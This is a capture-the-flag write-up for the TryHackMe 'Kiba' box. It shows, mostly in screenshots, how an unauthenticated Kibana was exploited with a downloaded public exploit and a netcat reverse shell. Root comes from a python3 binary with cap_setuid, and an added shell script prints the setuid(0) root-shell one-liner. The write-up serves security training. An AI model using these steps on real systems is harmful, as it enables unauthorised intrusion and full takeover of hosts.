# Kiba

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdmy51wIfnhDJU4Q3iF%2Fimage.png?alt=media\&token=f511e4bf-ad83-4221-966d-191c5325ee42)

Let's search Google for the answer to the first question.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdmyxvy-DD6Jrf_EnLf%2Fimage.png?alt=media\&token=04ddd7df-d9ac-4228-a3e0-6d1f7dfece9c)

## Scanning

Let's run a network scan to find open ports and services.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-SD5RFwi0F92mbb_%2Fimage.png?alt=media\&token=679ed526-5d2d-4a41-ba63-f249da762045)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-MY1JpljiONOAPMk%2Fimage.png?alt=media\&token=226728c9-1e38-4d30-8d81-a6f74f461033)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn-q0d79_7RxDdk8HV%2Fimage.png?alt=media\&token=e367af37-138a-4b35-b8d6-55abd7494754)

## Enumeration

Let's check the web page running on port 80.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-MdmzYeGBBa5HggLoE_V%2Fimage.png?alt=media\&token=1ce4b8c1-b317-4553-bce7-6fa5208dc572)

There is nothing there. Let's check port 5044. That port is the default Logstash Beats input, which speaks a binary protocol rather than HTTP, so a browser will not get anything useful from it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn01KWMnZXh8LOpBnI%2Fimage.png?alt=media\&token=53f09e0f-f182-4af0-bb7b-25772d00842a)

Nothing. Let's check port 5601, the default Kibana port.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0BLkpFgRh9_F1zU0%2Fimage.png?alt=media\&token=7e1429aa-a39e-457b-8f0d-97f66739f5a8)

We have a Kibana app running, and there is no login in front of it. Let's check the `version` in the Management tab (when Kibana has no authentication configured, the same version number is also returned by its `/api/status` endpoint).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0NYWMcPKT6jqA38C%2Fimage.png?alt=media\&token=d669fd8d-5eab-41ce-b10f-0c80964fa821)

Let's search Google for a known vulnerability affecting this version.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn0pER9IMh2P_zauIg%2Fimage.png?alt=media\&token=fac3637a-ecf8-4579-80fd-236e7ce5a079)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2crl-G2G_CpwTqmB%2Fimage.png?alt=media\&token=41932c4a-e3f1-4dbf-affd-f58c835b9a1a)

## Exploitation

Looks like we found one. Let's download the exploit script.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn15CgZF-nWBYAUN0X%2Fimage.png?alt=media\&token=69ffcaf0-e213-41ca-bed4-8bb27000c880)

Let's read through the exploit before running it, both to see what options it needs and to confirm what it actually does to the target.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn1a82WdPPn51NWdoC%2Fimage.png?alt=media\&token=c605c285-675f-4ab0-a1bd-6752d06ac166)

Looks like we have options to set. Let's first start a netcat listener to catch the reverse shell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn1hoVfO9LASoV7QBj%2Fimage.png?alt=media\&token=7c17ecf5-e598-480c-a6aa-8e5d4bfe2ff5)

Now let's run the exploit with the right options (the target host and port, plus our listener's host and port).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2I6h2gDv9ElAhzs1%2Fimage.png?alt=media\&token=f88af9ac-09b9-4450-a6f6-c5d5f79cb07f)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2Kbug-KJMkXf7trF%2Fimage.png?alt=media\&token=f1a80850-c367-45d8-8b16-cd8311d2199c)

We have a shell as the Kibana user. Let's read the user flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn2UgMUjf5RCp46SRA%2Fimage.png?alt=media\&token=64f5e752-9bcf-45d4-9b63-58048d844d1d)

## Privilege Escalation

The next TryHackMe question mentions capabilities, so let's check how to list file capabilities on Linux. They do not show up in `ls -l`; `getcap` is the tool that reads them.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn41zydhbE6-9b1rgB%2Fimage.png?alt=media\&token=94fedc42-310a-4d95-b3ce-73a70f86649e)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn6FA0I0BiNr-_S3Fa%2Fimage.png?alt=media\&token=a12c63ec-ef81-4880-8fa0-d3b3f58974e2)

The capability set on that binary is described in the capabilities(7) man page [here](https://man7.org/linux/man-pages/man7/capabilities.7.html).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn50DSMhyBivq1P4TV%2Fimage.png?alt=media\&token=b8f9f684-c8d9-40b1-b53b-9d8e594a9ad9)

Looks like we can change our `UID` using the `python3` binary in the `kiba` directory, since it carries the setuid capability. Let's check it out.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn5a-YrXJkIpwae1Jn%2Fimage.png?alt=media\&token=0cf92f02-5a16-4905-af7b-454151e7c154)

Let's run the binary and have it change our UID to 0, which is root's UID, then spawn a shell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn5suoNQ9PME62rYH5%2Fimage.png?alt=media\&token=4ba25b94-7075-47a9-bb4e-23b00dbc8459)
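The whole privilege escalation, from listing capabilities to the root shell, as an added example written for this page (it is not code from the writeup or from the box). The `getcap` output is a constructed sample and the `/home/kiba/python3` path is a placeholder; on the target you would feed in the real output of `getcap -r / 2>/dev/null`.

```shell
#!/bin/sh
# Added example: enumerate file capabilities and build the cap_setuid
# escalation. The getcap output below is a constructed sample, not
# captured from the target, and the paths are placeholders.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/home/kiba/python3 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep'

# Print only entries whose capability set lets the binary change identity.
# cap_setuid / cap_setgid are the ones that give a direct root shell.
# The trailing "+ep" (effective, permitted) matters: the process gets the
# capability immediately on exec. A stock python3 never raises capabilities
# itself, so a "+p"-only entry would not be enough for os.setuid(0).
dangerous_caps() {
    printf '%s\n' "$1" | grep -E 'cap_(setuid|setgid)' || true
}

# Extract the binary path from a getcap line. Works for both output styles:
#   "/path = cap_setuid+ep"   (older libcap)
#   "/path cap_setuid=ep"     (libcap >= 2.41)
cap_binary() {
    printf '%s\n' "$1" | awk '{print $1}'
}

# Build the one-liner that calls setuid(0) through the capability-bearing
# interpreter and then spawns a shell as root.
setuid_payload() {
    printf "%s -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'\n" "$1"
}

# Stand-alone demo: for every dangerous entry, show the command to run.
dangerous_caps "$SAMPLE_GETCAP" | while IFS= read -r line; do
    bin=$(cap_binary "$line")
    echo "[*] $line"
    echo "    run: $(setuid_payload "$bin")"
done
```

Run the printed command from the reverse shell and confirm with `id` that the new shell reports `uid=0(root)`. The capability lives on that specific copy of `python3`; the system interpreter in `/usr/bin` has no such entry, which is why the writeup points at the one in the `kiba` directory.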

We are now root. Let's read the root flag.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdmxyZB80yRdVdMIUPs%2F-Mdn60J8lXG13ReNoJXN%2Fimage.png?alt=media\&token=2530ea6b-3c6c-44c1-83da-3fb733b25cb5)
